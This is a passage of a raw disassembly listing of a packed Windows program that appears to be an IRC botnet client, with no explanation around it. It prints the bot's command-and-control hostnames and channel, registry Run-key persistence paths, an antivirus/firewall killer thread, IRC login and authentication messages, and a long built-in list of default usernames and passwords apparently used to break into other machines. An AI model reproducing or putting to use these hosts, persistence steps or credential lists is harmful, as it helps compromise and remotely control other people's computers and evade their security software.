DATA XREF: UPX0:00427E34o dd 2, 427E08h, 3 dup(0) dd offset off_43D77C dd offset dword_427E10+4 off_427E38 dd offset off_43D79C ; DATA XREF: UPX0:00427E50o dd 2, 0 dd 0FFFFFFFFh, 2 dup(0) dd offset off_427E38 dd offset off_427DF0 dd offset dword_427DC0+18h dword_427E5C dd 3 dup(0) ; DATA XREF: UPX0:00427E80o dd 3, 427E50h dword_427E70 dd 3 dup(0) ; DATA XREF: UPX0:00427D10o dd offset off_43D79C dd offset dword_427E5C+4 off_427E84 dd offset off_43D7BC ; DATA XREF: UPX0:00427E9Co dd 2, 0 dd 0FFFFFFFFh, 2 dup(0) dd offset off_427E84 dd offset off_427DF0 dd offset dword_427DC0+18h dword_427EA8 dd 3 dup(0) ; DATA XREF: UPX0:00427ECCo dd 3, 427E9Ch dword_427EBC dd 3 dup(0) ; DATA XREF: UPX0:00427D3Co dd offset off_43D7BC dd offset dword_427EA8+4 off_427ED0 dd offset off_43D7E0 ; DATA XREF: UPX0:00427EE8o dd 2 dup(0) dd 0FFFFFFFFh, 2 dup(0) dd offset off_427ED0 dword_427EEC dd 3 dup(0) ; DATA XREF: UPX0:00427F10o dd 1, 427EE8h dword_427F00 dd 3 dup(0) ; DATA XREF: UPX0:00427D5Co dd offset off_43D7E0 dd offset dword_427EEC+4 dd offset dword_427DC0+18h dword_427F18 dd 4 dup(0) ; DATA XREF: UPX0:00427F40o dd 1, 427F14h dword_427F30 dd 3 dup(0) ; DATA XREF: UPX0:00427D64o dd offset off_43D764 dd offset dword_427F18+8 align 8 dword_427F48 dd 19930520h, 2, 427F68h, 5 dup(0) ; DATA XREF: UPX0:loc_426DF7o dd 0FFFFFFFFh, 426DE0h, 0 dd offset sub_426DD8 dword_427F78 dd 19930520h, 2, 427F98h, 5 dup(0) ; DATA XREF: UPX0:loc_426E14o dd 0FFFFFFFFh, 426E04h, 0 dd offset loc_426E0C dword_427FA8 dd 19930520h, 2, 427FC8h, 1, 427FD8h, 3 dup(0) ; DATA XREF: UPX0:loc_426E20o dd 0FFFFFFFFh, 0 dd 0FFFFFFFFh, 3 dup(0) dd 2 dup(1), 427FF0h, 4 dup(0) ; --------------------------------------------------------------------------- retf ; --------------------------------------------------------------------------- db 0D7h, 40h, 0 dd 0FFFFFFFFh, 426E2Ah dword_428008 dd 19930520h, 1, 428000h, 5 dup(0) ; DATA XREF: UPX0:loc_426E32o dd offset off_43D764 align 10h dd 0FFFFFFFFh, 0 dd 0Ch, 42686Ch, 0 dd offset off_43D77C dd 0 dd 0FFFFFFFFh, 0 dd 1Ch, 426618h, 0 dd offset off_43D79C align 8 dd 0FFFFFFFFh, 0 dword_428070 dd 1Ch, 426682h, 3, 42805Ch, 428040h, 428024h ; DATA XREF: UPX0:00428094o dword_428088 dd 0 ; DATA XREF: sub_426573+2Eo ; sub_4266F6+4Bo dd offset sub_426568 dd 0 dd offset dword_428070+8 dd 0FFFFFFFFh, 426E3Ch dword_4280A0 dd 19930520h, 1, 428098h, 4 dup(0) ; DATA XREF: UPX0:loc_426E44o dd 0FFFFFFFFh, 426E4Eh dword_4280C4 dd 19930520h, 1, 4280BCh, 4 dup(0) ; DATA XREF: UPX0:loc_426E56o dd 0FFFFFFFFh, 426E60h dword_4280E8 dd 19930520h, 1, 4280E0h, 5 dup(0) ; DATA XREF: UPX0:loc_426E68o dd offset off_43D7BC align 10h dd 0FFFFFFFFh, 0 dword_428118 dd 1Ch, 4266DEh, 3, 428104h, 428040h, 428024h ; DATA XREF: UPX0:0042813Co dword_428130 dd 0 ; DATA XREF: sub_42669A+2Eo ; sub_4266F6+2Do dd offset sub_426677 dd 0 dd offset dword_428118+8 dd 0FFFFFFFFh, 426E72h dword_428148 dd 19930520h, 1, 428140h, 4 dup(0) ; DATA XREF: UPX0:loc_426E7Ao dword_428164 dd 2, 428040h, 428024h ; DATA XREF: UPX0:0042817Co dword_428170 dd 0 ; DATA XREF: sub_4266F6+Fo dd offset sub_4264BA dd 0 dd offset dword_428164 dd 3A0h dup(0) dword_429000 dd 0 ; DATA XREF: sub_41B784+1Fo dd offset loc_401205 dd offset sub_40D879 dd offset sub_40D89B dd offset sub_40E6D4 dword_429014 dd 0 ; DATA XREF: sub_41B784+1Ao dword_429018 dd 0 ; DATA XREF: sub_41B784+10o dd offset sub_41D052 dd offset sub_42026D dd offset sub_423936 dd offset sub_424752 dword_42902C dd 0 ; DATA XREF: sub_41B784:loc_41B78Fo dword_429030 dd 0 ; DATA XREF: sub_41B7D3+65o dd offset sub_4239DB dword_429038 dd 0 ; DATA XREF: sub_41B7D3:loc_41B833o dword_42903C dd 0 ; DATA XREF: sub_41B7D3+76o dd offset sub_424763 dword_429044 dd 3 dup(0) ; DATA XREF: sub_41B7D3:loc_41B844o dword_429050 dd 80000002h, 429178h, 80000002h, 4291A8h, 80000001h, 429178h ; DATA XREF: sub_401000+7o dword_429068 dd 6272h ; DATA XREF: sub_401000+63o ; sub_4010AB+Bo ... dword_42906C dd 1B58h ; DATA XREF: sub_401221+4A4r ; sub_401221+539r dword_429070 dd 0C8Bh ; DATA XREF: sub_401221+585r dword_429074 dd 7E4h ; DATA XREF: sub_401ACD:loc_40461Cr dword_429078 dd 45h ; DATA XREF: sub_401ACD+2089r ; sub_40BACE+3Br dword_42907C dd 7D1h ; DATA XREF: sub_401ACD:loc_403C44r ; sub_40BACE:loc_40BEBFr dword_429080 dd 201h ; DATA XREF: sub_401ACD:loc_403DD0r word_429084 dw 7C7h ; DATA XREF: sub_401ACD:loc_40473Fr align 4 dword_429088 dd 1 ; DATA XREF: sub_401ACD+65Fr dword_42908C dd 1 ; DATA XREF: sub_401221+13Dr dword_429090 dd 1 ; DATA XREF: sub_401221:loc_401562r ; sub_41835A+Cr byte_429094 db 2Eh ; DATA XREF: sub_401ACD+A92r ; sub_401ACD+B4Cr ... align 4 dword_429098 dd 0Ah ; DATA XREF: sub_40ACB6+3Ar ; sub_40ACB6+60r ... dword_42909C dd 4 ; DATA XREF: sub_4017ED+78r ; sub_401ACD+279r ... dword_4290A0 dd 1 ; DATA XREF: sub_4017ED+72r ; sub_401ACD+273r aQufpoius db 'qufpoius',0 ; DATA XREF: sub_401221+5Do ; sub_401ACD:loc_4044A1o ... align 10h aAbosel7Vs db 'abosel7 vs',0 ; DATA XREF: sub_401ACD:loc_404946o align 4 aCool db 'cool',0 ; DATA XREF: sub_401ACD+7DDCo ; sub_401ACD+7EABo align 4 aSaber4_ircqfor db 'saber4.ircqforum.com',0 ; DATA XREF: sub_401221+490o ; sub_401221+52Ao align 4 aFaak db '#FAAK#',0 ; DATA XREF: sub_401221+4B0o ; sub_401221+540o ... align 4 aSaad_ db 'saad.',0 ; DATA XREF: sub_401221+4C7o ; sub_401221+552o align 4 byte_4290EC db 73h ; DATA XREF: sub_401221:loc_401789r ; sub_401221+576o aCorti1_dns2go_ db 'corti1.dns2go.com',0 align 10h aFaak_0 db '#FAAK#',0 ; DATA XREF: sub_401221+58Co align 4 aSaad__0 db 'saad.',0 ; DATA XREF: sub_401221+59Eo align 10h byte_429110 db 67h ; DATA XREF: sub_401221+143o ; sub_401221+167w ... db 67h, 76h, 79h dd 69767671h, 78652E68h, 65h dword_429120 dd 6E646977h, 61622E74h, 74h ; DATA XREF: sub_411C14+3Do aWindsSerscAgts db 'Winds Sersc Agts',0 ; DATA XREF: sub_401000+Eo align 10h asc_429140: ; DATA XREF: UPX0:0040AD35o unicode 0, <->,0 aWinsys_dat db 'winsys.dat',0 align 10h aXI db '-x+i',0 ; DATA XREF: sub_401ACD+7F27o align 4 aF db '#f',0 ; DATA XREF: sub_401ACD+1D46o ; sub_401ACD+3040o ... align 4 aF_0 db '#f',0 ; DATA XREF: sub_401ACD+44A3o align 10h aF_1 db '#f',0 ; DATA XREF: sub_401ACD+40C5o ; sub_401ACD+4217o align 4 off_429164 dd offset a@admin_com ; DATA XREF: sub_401ACD:loc_4098FCo ; "*@admin.com" off_429168 dd offset aMircV6_16Khale ; DATA XREF: sub_401ACD+8C3r ; sub_401ACD+7E4Bo ; "mIRC v6.16 Khaled Mardam-Bey" dd offset aMircV6_17Khale ; "mIRC v6.17 Khaled Mardam-Bey" dd offset aMircV6_20Khale ; "mIRC v6.20 Khaled Mardam-Bey" dd offset aMircV6_21Khale ; "mIRC v6.21 Khaled Mardam-Bey" aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion\Run',0 align 4 db 53h aOftwareMicroso db 'oftware\Microsoft\Windows\CurrentVersion\RunServices',0 align 10h aSoftwareMicros db 'Software\Microsoft\OLE',0 ; DATA XREF: sub_419E7A+28o ; sub_41A19E+28o align 4 aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control\Lsa',0 ; DATA XREF: sub_419E7A+D4o ; sub_41A19E+D4o align 10h dd 2 dup(1), 70747468h, 772F2F3Ah, 662E7777h, 77656572h dd 6F746265h, 632E6E77h, 7A2F6D6Fh, 2F737678h, 73636E76h dd 652E6D79h, 6578h, 429940h, 429930h, 429920h, 429914h dd 42990Ch, 429904h, 4298FCh, 4298F4h, 4298E8h, 4298E0h dd 4298D8h, 4298D0h, 4298C4h, 4298BCh, 4298B4h, 4298A8h dd 4298A4h, 42989Ch, 429898h, 0 dd offset byte_43D808 dd offset aAdministrato_0 ; "administrator" dd offset aAdministrador ; "administrador" dd offset aAdministrateur ; "administrateur" dd offset aAdministrat ; "administrat" dd offset aAdmins ; "admins" dd offset aAdmin ; "admin" dd offset aAdm ; "adm" dd offset aPassword1 ; "password1" dd offset aPassword ; "password" dd offset aPasswd ; "passwd" dd offset aPass1234 ; "pass1234" dd offset aPass_0 ; "pass" dd offset aPwd ; "pwd" dd offset a007 ; "007" dd offset a1 ; "1" dd offset a12 ; "12" dd offset a123 ; "123" dd offset a1234 ; "1234" dd offset a12345 ; "12345" dd offset a123456 ; "123456" dd offset a1234567 ; "1234567" dd offset a12345678 ; "12345678" dd offset a123456789 ; "123456789" dd offset a1234567890 ; "1234567890" dd offset a2000 ; "2000" dd offset a2001 ; "2001" dd offset a2002 ; "2002" dd offset a2003 ; "2003" dd offset a2004 ; "2004" dd offset aTest ; "test" dd offset aGuest_0 ; "guest" dd offset aNone ; "none" dd offset aDemo ; "demo" dd offset aUnix ; "unix" dd offset aLinux ; "linux" dd offset aChangeme ; "changeme" dd offset aDefault ; "default" dd offset aSystem ; "system" dd offset aServer ; "server" dd offset aRoot ; "root" dd offset aNull_1 ; "null" dd offset aQwerty ; "qwerty" dd offset aMail ; "mail" dd offset aOutlook ; "outlook" dd offset aWeb ; "web" dd offset aWww ; "www" dd offset aInternet ; "internet" dd offset aAccounts ; "accounts" dd offset aAccounting ; "accounting" dd offset aHome ; "home" dd offset aHomeuser ; "homeuser" dd offset aUser ; "user" dd offset aOem ; "oem" dd offset aOemuser ; "oemuser" dd offset aOeminstall ; "oeminstall" dd offset aWindows ; "windows" dd offset aWin98 ; "win98" dd offset aWin2k ; "win2k" dd offset aWinxp ; "winxp" dd offset aWinnt ; "winnt" dd offset aWin2000 ; "win2000" dd offset aQaz ; "qaz" dd offset aAsd ; "asd" dd offset aZxc ; "zxc" dd offset aQwe ; "qwe" dd offset aBob ; "bob" dd offset aJen ; "jen" dd offset aJoe ; "joe" dd offset aFred ; "fred" dd offset aBill ; "bill" dd offset aMike ; "mike" dd offset aJohn ; "john" dd offset aPeter ; "peter" dd offset aLuke ; "luke" dd offset aSam ; "sam" dd offset aSue ; "sue" dd offset aSusan ; "susan" dd offset aPeter ; "peter" dd offset aBrian ; "brian" dd offset aLee ; "lee" dd offset aNeil ; "neil" dd offset aIan ; "ian" dd offset aChris ; "chris" dd offset aEric ; "eric" dd offset aGeorge ; "george" dd offset aKate ; "kate" dd offset aBob ; "bob" dd offset aKatie ; "katie" dd offset aMary ; "mary" dd offset aLogin ; "login" dd offset aLoginpass ; "loginpass" dd offset aTechnical ; "technical" dd offset aBackup ; "backup" dd offset aExchange ; "exchange" dd offset aFuck ; "fuck" dd offset aBitch ; "bitch" dd offset aSlut ; "slut" dd offset aSex ; "sex" dd offset aGod ; "god" dd offset aHell ; "hell" dd offset aHello ; "hello" dd offset aDomain ; "domain" dd offset aDomainpass ; "domainpass" dd offset aDomainpassword ; "domainpassword" dd offset aDatabase ; "database" dd offset aAccess ; "access" dd offset aDbpass ; "dbpass" dd offset aDbpassword ; "dbpassword" dd offset aDatabasepass ; "databasepass" dd offset aData ; "data" dd offset aDatabasepasswo ; "databasepassword" dd offset aDb1 ; "db1" dd offset aDb2 ; "db2" dd offset aDb1234 ; "db1234" dd offset aSa ; "sa" dd offset aSql ; "sql" dd offset aSqlpassoainsta ; "sqlpassoainstall" dd offset aOrainstall ; "orainstall" dd offset aOracle ; "oracle" dd offset aIbm ; "ibm" dd offset aCisco ; "cisco" dd offset aDell ; "dell" dd offset aCompaq ; "compaq" dd offset aSiemens ; "siemens" dd offset aHp ; "hp" dd offset aNokia ; "nokia" dd offset aXp ; "xp" dd offset aControl ; "control" dd offset aOffice ; "office" dd offset aBlank ; "blank" dd offset aWinpass ; "winpass" dd offset aMain ; "main" dd offset aLan ; "lan" dd offset aInternet ; "internet" dd offset aIntranet ; "intranet" dd offset aStudent ; "student" dd offset aTeacher ; "teacher" dd offset aStaff ; "staff" dd 0 dword_4294D4 dd 10h ; DATA XREF: sub_401ACD+AFCr ; sub_401ACD+B28r ... aIntranet db 'intranet',0 ; DATA XREF: UPX0:004294C0o align 4 aLan db 'lan',0 ; DATA XREF: UPX0:004294B8o aMain db 'main',0 ; DATA XREF: UPX0:004294B4o align 10h aWinpass db 'winpass',0 ; DATA XREF: UPX0:004294B0o aBlank db 'blank',0 ; DATA XREF: UPX0:004294ACo align 10h aOffice db 'office',0 ; DATA XREF: UPX0:004294A8o align 4 aControl db 'control',0 ; DATA XREF: UPX0:004294A4o aXp db 'xp',0 ; DATA XREF: UPX0:004294A0o align 4 aNokia db 'nokia',0 ; DATA XREF: UPX0:0042949Co align 4 aHp db 'hp',0 ; DATA XREF: UPX0:00429498o align 10h aSiemens db 'siemens',0 ; DATA XREF: UPX0:00429494o aCompaq db 'compaq',0 ; DATA XREF: UPX0:00429490o align 10h aDell db 'dell',0 ; DATA XREF: UPX0:0042948Co align 4 aCisco db 'cisco',0 ; DATA XREF: UPX0:00429488o align 10h aIbm db 'ibm',0 ; DATA XREF: UPX0:00429484o aOrainstall db 'orainstall',0 ; DATA XREF: UPX0:0042947Co align 10h aSqlpassoainsta db 'sqlpassoainstall',0 ; DATA XREF: UPX0:00429478o align 4 aSql db 'sql',0 ; DATA XREF: UPX0:00429474o aSa db 'sa',0 ; DATA XREF: sub_401ACD+1BFDo ; UPX0:00429470o align 4 aDb1234 db 'db1234',0 ; DATA XREF: UPX0:0042946Co align 4 aDb1 db 'db1',0 ; DATA XREF: UPX0:00429464o aDatabasepasswo db 'databasepassword',0 ; DATA XREF: UPX0:00429460o align 4 aData db 'data',0 ; DATA XREF: UPX0:0042945Co align 4 aDatabasepass db 'databasepass',0 ; DATA XREF: UPX0:00429458o align 4 aDbpassword db 'dbpassword',0 ; DATA XREF: UPX0:00429454o align 10h aDbpass db 'dbpass',0 ; DATA XREF: UPX0:00429450o align 4 aAccess db 'access',0 ; DATA XREF: UPX0:0042944Co align 10h aDomainpassword db 'domainpassword',0 ; DATA XREF: UPX0:00429444o align 10h aDomainpass db 'domainpass',0 ; DATA XREF: UPX0:00429440o align 4 aDomain db 'domain',0 ; DATA XREF: UPX0:0042943Co align 4 aHello db 'hello',0 ; DATA XREF: UPX0:00429438o align 4 aHell db 'hell',0 ; DATA XREF: UPX0:00429434o align 4 aGod db 'god',0 ; DATA XREF: UPX0:00429430o aSex db 'sex',0 ; DATA XREF: UPX0:0042942Co ; UPX0:off_4385E8o aSlut db 'slut',0 ; DATA XREF: UPX0:00429428o align 4 aBitch db 'bitch',0 ; DATA XREF: UPX0:00429424o align 4 aFuck db 'fuck',0 ; DATA XREF: UPX0:00429420o align 4 aExchange db 'exchange',0 ; DATA XREF: UPX0:0042941Co align 10h aBackup db 'backup',0 ; DATA XREF: UPX0:00429418o align 4 aTechnical db 'technical',0 ; DATA XREF: UPX0:00429414o align 4 aLoginpass db 'loginpass',0 ; DATA XREF: UPX0:00429410o align 10h aLogin db 'login',0 ; DATA XREF: sub_401ACD+AA3o ; UPX0:0042940Co align 4 aMary db 'mary',0 ; DATA XREF: UPX0:00429408o align 10h aKatie db 'katie',0 ; DATA XREF: UPX0:00429404o align 4 aKate db 'kate',0 ; DATA XREF: UPX0:004293FCo align 10h aGeorge db 'george',0 ; DATA XREF: UPX0:004293F8o align 4 aEric db 'eric',0 ; DATA XREF: UPX0:004293F4o align 10h aChris db 'chris',0 ; DATA XREF: UPX0:004293F0o align 4 aIan db 'ian',0 ; DATA XREF: UPX0:004293ECo aNeil db 'neil',0 ; DATA XREF: UPX0:004293E8o align 4 aLee db 'lee',0 ; DATA XREF: UPX0:004293E4o aBrian db 'brian',0 ; DATA XREF: UPX0:004293E0o align 10h aSusan db 'susan',0 ; DATA XREF: UPX0:004293D8o align 4 aSue db 'sue',0 ; DATA XREF: UPX0:004293D4o aSam db 'sam',0 ; DATA XREF: UPX0:004293D0o aLuke db 'luke',0 ; DATA XREF: UPX0:004293CCo align 4 aPeter db 'peter',0 ; DATA XREF: UPX0:004293C8o ; UPX0:004293DCo align 10h aJohn db 'john',0 ; DATA XREF: UPX0:004293C4o align 4 aMike db 'mike',0 ; DATA XREF: UPX0:004293C0o align 10h aBill db 'bill',0 ; DATA XREF: UPX0:004293BCo align 4 aFred db 'fred',0 ; DATA XREF: UPX0:004293B8o align 10h aJoe db 'joe',0 ; DATA XREF: UPX0:004293B4o aJen db 'jen',0 ; DATA XREF: UPX0:004293B0o aBob db 'bob',0 ; DATA XREF: UPX0:004293ACo ; UPX0:00429400o aQwe db 'qwe',0 ; DATA XREF: UPX0:004293A8o aZxc db 'zxc',0 ; DATA XREF: UPX0:004293A4o aAsd db 'asd',0 ; DATA XREF: UPX0:004293A0o aQaz db 'qaz',0 ; DATA XREF: UPX0:0042939Co aWin2000 db 'win2000',0 ; DATA XREF: UPX0:00429398o aWinnt db 'winnt',0 ; DATA XREF: UPX0:00429394o align 4 aWinxp db 'winxp',0 ; DATA XREF: UPX0:00429390o align 4 aWin2k db 'win2k',0 ; DATA XREF: UPX0:0042938Co align 4 aWin98 db 'win98',0 ; DATA XREF: UPX0:00429388o align 4 aWindows db 'windows',0 ; DATA XREF: UPX0:00429384o aOeminstall db 'oeminstall',0 ; DATA XREF: UPX0:00429380o align 4 aOemuser db 'oemuser',0 ; DATA XREF: UPX0:0042937Co aOem db 'oem',0 ; DATA XREF: UPX0:00429378o aUser db 'user',0 ; DATA XREF: sub_401ACD+46D4o ; UPX0:00429374o align 4 aHomeuser db 'homeuser',0 ; DATA XREF: UPX0:00429370o align 4 aHome db 'home',0 ; DATA XREF: UPX0:0042936Co align 10h aAccounting db 'accounting',0 ; DATA XREF: UPX0:00429368o align 4 aAccounts db 'accounts',0 ; DATA XREF: UPX0:00429364o align 4 aInternet db 'internet',0 ; DATA XREF: UPX0:00429360o ; UPX0:004294BCo align 4 aWww db 'www',0 ; DATA XREF: UPX0:0042935Co aWeb db 'web',0 ; DATA XREF: UPX0:00429358o aOutlook db 'outlook',0 ; DATA XREF: UPX0:00429354o aMail db 'mail',0 ; DATA XREF: UPX0:00429350o align 4 aQwerty db 'qwerty',0 ; DATA XREF: UPX0:0042934Co align 4 aNull_1 db 'null',0 ; DATA XREF: UPX0:00429348o align 4 aServer db 'server',0 ; DATA XREF: sub_401ACD+3E90o ; UPX0:00429340o align 4 aSystem db 'system',0 ; DATA XREF: UPX0:0042933Co align 4 aChangeme db 'changeme',0 ; DATA XREF: UPX0:00429334o align 4 aLinux db 'linux',0 ; DATA XREF: UPX0:00429330o align 10h aUnix db 'unix',0 ; DATA XREF: UPX0:0042932Co align 4 aDemo db 'demo',0 ; DATA XREF: UPX0:00429328o align 10h aNone db 'none',0 ; DATA XREF: UPX0:00429324o align 4 aTest db 'test',0 ; DATA XREF: UPX0:0042931Co align 10h a2004 db '2004',0 ; DATA XREF: UPX0:00429318o align 4 a2003 db '2003',0 ; DATA XREF: sub_41AA43+BAo ; UPX0:00429314o align 10h a2002 db '2002',0 ; DATA XREF: UPX0:00429310o align 4 a2001 db '2001',0 ; DATA XREF: UPX0:0042930Co align 10h a2000 db '2000',0 ; DATA XREF: UPX0:00429308o align 4 a1234567890 db '1234567890',0 ; DATA XREF: UPX0:00429304o align 4 a123456789 db '123456789',0 ; DATA XREF: UPX0:00429300o align 10h a12345678 db '12345678',0 ; DATA XREF: UPX0:004292FCo align 4 a1234567 db '1234567',0 ; DATA XREF: UPX0:004292F8o a123456 db '123456',0 ; DATA XREF: UPX0:004292F4o align 4 a12345 db '12345',0 ; DATA XREF: UPX0:004292F0o align 4 a1234 db '1234',0 ; DATA XREF: UPX0:004292ECo align 4 a123 db '123',0 ; DATA XREF: UPX0:004292E8o a12 db '12',0 ; DATA XREF: UPX0:004292E4o align 4 a1: ; DATA XREF: UPX0:004292E0o unicode 0, <1>,0 a007 db '007',0 ; DATA XREF: UPX0:004292DCo aPwd db 'pwd',0 ; DATA XREF: UPX0:004292D8o aPass_0 db 'pass',0 ; DATA XREF: UPX0:004292D4o align 4 aPass1234 db 'pass1234',0 ; DATA XREF: UPX0:004292D0o align 4 aPasswd db 'passwd',0 ; DATA XREF: UPX0:004292CCo align 4 aPassword db 'password',0 ; DATA XREF: UPX0:004292C8o align 4 aPassword1 db 'password1',0 ; DATA XREF: UPX0:004292C4o align 4 aAdm db 'adm',0 ; DATA XREF: UPX0:004292C0o aDb2 db 'db2',0 ; DATA XREF: UPX0:00429468o aOracle db 'oracle',0 ; DATA XREF: UPX0:00429480o align 4 aDba db 'dba',0 aDatabase db 'database',0 ; DATA XREF: UPX0:00429448o align 4 aDefault db 'default',0 ; DATA XREF: UPX0:00429338o aGuest_0 db 'guest',0 ; DATA XREF: UPX0:00429320o align 4 aWwwadmin db 'wwwadmin',0 align 10h aTeacher db 'teacher',0 ; DATA XREF: UPX0:004294C8o aStudent db 'student',0 ; DATA XREF: UPX0:004294C4o aOwner db 'owner',0 align 4 aComputer db 'computer',0 align 4 aRoot db 'root',0 ; DATA XREF: UPX0:00429344o align 4 aStaff db 'staff',0 ; DATA XREF: UPX0:004294CCo align 4 aAdmin db 'admin',0 ; DATA XREF: UPX0:004292BCo align 4 aAdmins db 'admins',0 ; DATA XREF: UPX0:004292B8o align 4 aAdministrat db 'administrat',0 ; DATA XREF: UPX0:004292B4o aAdministrateur db 'administrateur',0 ; DATA XREF: UPX0:004292B0o align 10h aAdministrador db 'administrador',0 ; DATA XREF: UPX0:004292ACo align 10h aAdministrato_0 db 'administrator',0 ; DATA XREF: UPX0:004292A8o align 10h aMircV6_21Khale db 'mIRC v6.21 Khaled Mardam-Bey',0 ; DATA XREF: UPX0:00429174o align 10h aMircV6_20Khale db 'mIRC v6.20 Khaled Mardam-Bey',0 ; DATA XREF: UPX0:00429170o align 10h aMircV6_17Khale db 'mIRC v6.17 Khaled Mardam-Bey',0 ; DATA XREF: UPX0:0042916Co align 10h aMircV6_16Khale db 'mIRC v6.16 Khaled Mardam-Bey',0 ; DATA XREF: UPX0:off_429168o align 10h a@admin_com db '*@admin.com',0 ; DATA XREF: UPX0:off_429164o dword_4299DC dd 234032Dh, 6E656469h, 2036474h ; DATA XREF: sub_401221+46Bo aFailedToStartS db '- Failed to start server, error: <%d>.',0 align 10h dword_429A10 dd 234032Dh, 6E656469h, 2036474h ; DATA XREF: sub_401221+420o aServerRunningO db '- Server running on Port: 113.',0 align 4 unk_429A3C db 2Dh ; - ; DATA XREF: sub_401221+3F3o db 3, 34h, 2 db 70h ; p db 72h, 6Fh, 63h db 73h ; s db 3, 2, 2Dh aFailedToStartA db ' Failed to start AV/FW killer thread, error: <%d>.',0 align 4 unk_429A7C db 2Dh ; - ; DATA XREF: sub_401221+3A2o db 3, 34h, 2 db 70h ; p db 72h, 6Fh, 63h db 73h ; s db 3, 2, 2Dh aAvFwKillerActi db ' AV/FW Killer active.',0 align 10h dword_429AA0 dd 234032Dh, 6E69616Dh, 202D0203h, 20746F42h, 72617473h ; DATA XREF: sub_401221+364o dd 2E646574h, 0 dword_429ABC dd 25207325h, 25222064h, 2273h ; DATA XREF: sub_401221+28Fo dword_429AC8 dd 255C7325h, 73h ; DATA XREF: sub_401221+189o ; sub_415A30+7Eo ... dword_429AD0 dd 73257325h, 0 ; DATA XREF: sub_401221+10Do ; sub_40F6B4+EAo ... unk_429AD8 db 2Dh ; - ; DATA XREF: sub_4017ED+F2o db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aConnectedToS_ db 'Connected to %s.',0 align 4 aNickSUserS00S db 'NICK %s',0Dh,0Ah ; DATA XREF: sub_401955+62o db 'USER %s 0 0 :%s',0Dh,0Ah,0 align 4 aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_401955+35o align 10h aModeSS_0 db 'MODE %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+7F2Fo align 10h aUserhostS db 'USERHOST %s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+7F17o align 10h unk_429B40 db 2Dh ; - ; DATA XREF: sub_401ACD+7F0Ao db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aUserSLoggedIn_ db 'User: %s logged in.',0 unk_429B60 db 2Dh ; - ; DATA XREF: sub_401ACD+7EEDo db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aPasswordAccept db 'Password accepted.',0 align 10h unk_429B80 db 2Dh ; - ; DATA XREF: sub_401ACD+7E8Co db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aFailedHostAuth db '*Failed host auth by: (%s!%s).',0 align 4 aNoticeSHostAut db 'NOTICE %s :Host Auth failed (%s!%s).',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+7E63o align 4 unk_429BD4 db 2Dh ; - ; DATA XREF: sub_401ACD+7E25o db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aFailedPassAuth db '*Failed pass auth by: (%s!%s).',0 align 10h aNoticeSYourAtt db 'NOTICE %s :Your attempt has been logged.',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+7E13o ; sub_401ACD+7E7Ao align 4 aNoticeSPassAut db 'NOTICE %s :Pass auth failed (%s!%s).',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+7DFCo align 4 asc_429C54: ; DATA XREF: sub_401ACD+7DCCo unicode 0, <~>,0 unk_429C58 db 2Dh ; - ; DATA XREF: sub_401ACD+7D7Co db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aRandomNickChan db 'Random nick change: %s',0 align 4 unk_429C7C db 2Dh ; - ; DATA XREF: sub_401ACD+7D0Co db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aReconnectingIn db 'Reconnecting in %s seconds',0 align 4 unk_429CA4 db 2Dh ; - ; DATA XREF: sub_401ACD+7CC4o db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aReconnecting_0 db 'Reconnecting in %s ms',0 align 4 unk_429CC8 db 2Dh ; - ; DATA XREF: sub_401ACD+7CA2o db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aNickChangedToS db 'Nick changed to: ',27h,'%s',27h,'.',0 align 4 unk_429CEC db 2Dh ; - ; DATA XREF: sub_401ACD+7C82o db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aJoinedChannelS db 'Joined channel: ',27h,'%s',27h,'.',0 align 10h unk_429D10 db 2Dh ; - ; DATA XREF: sub_401ACD+7C5Bo db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aPartedChannelS db 'Parted channel: ',27h,'%s',27h,'.',0 align 4 dword_429D34 dd 234032Dh, 6E69616Dh, 202D0302h, 20435249h, 3A776152h ; DATA XREF: sub_401ACD+7C3Bo dd 2E732520h, 0 unk_429D50 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_409685o db 3, 34h, 2 db 74h ; t db 68h, 72h, 65h db 61h ; a db 64h, 73h, 2 db 3 aFailedToKillTh db '- Failed to kill thread: %s.',0 align 4 unk_429D7C db 2Dh ; - ; DATA XREF: sub_401ACD+7BB1o db 3, 34h, 2 db 74h ; t db 68h, 72h, 65h db 61h ; a db 64h, 73h, 2 db 3 aKilledThreadS_ db '- Killed thread: %s.',0 align 10h unk_429DA0 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_4095FDo db 3, 34h, 2 db 74h ; t db 68h, 72h, 65h db 61h ; a db 64h, 73h, 2 db 3 aNoActiveThread db '- No active threads found.',0 unk_429DC8 db 2Dh ; - ; DATA XREF: sub_401ACD+7B26o db 3, 34h, 2 db 74h ; t db 68h, 72h, 65h db 61h ; a db 64h, 73h, 2 db 3 aStoppedDThread db '- Stopped: %d thread(s).',0 align 10h aAll db 'all',0 ; DATA XREF: sub_401ACD+7B0Co unk_429DF4 db 2Dh ; - ; DATA XREF: sub_401ACD+79FFo db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aPrefixChangedT db 'Prefix changed to: ',27h,'%c',27h,'.',0 align 4 unk_429E1C db 2Dh ; - 